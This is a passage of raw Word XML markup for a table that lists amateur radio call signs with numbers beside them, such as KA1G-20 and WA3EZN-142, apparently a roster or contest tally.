              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="28E590FE" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>KA1G-20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1774" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="09F82A15" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>KC8IDM-63</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="107317E3" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>KM8V-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1952" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2A68120B" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>W8DJG-149</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="00E90022" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="23096269" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>K3AUX-38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1774" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3A111FF3" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>KC8WH-55</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3E0383E5" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>KV8Z- 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1952" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="27E7C122" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>W8GSR-57</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="609F76BB" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="05B6D679" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>K3RC- 45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1774" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="524E8353" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>KD8GYI-90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2910E24D" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>N2LC-58</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1952" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="07C661B8" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>WA3EZN-142</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="0618D7A4" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:trPr>
          <w:trHeight w:val="223"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="609AC830" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>K8KRA-55</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1774" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2CFEB4A0" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>KD8HB- 38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="42643A23" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>N8BV- 42</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1952" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1A172CA8" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> WB8PMG-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="4826B0B9" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0215614F" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>K8MDA-32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1774" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0942C60E" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>KD8KBX-45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="61B4BCF6" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>N8GBU- 43</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1952" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6DC20AD6" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
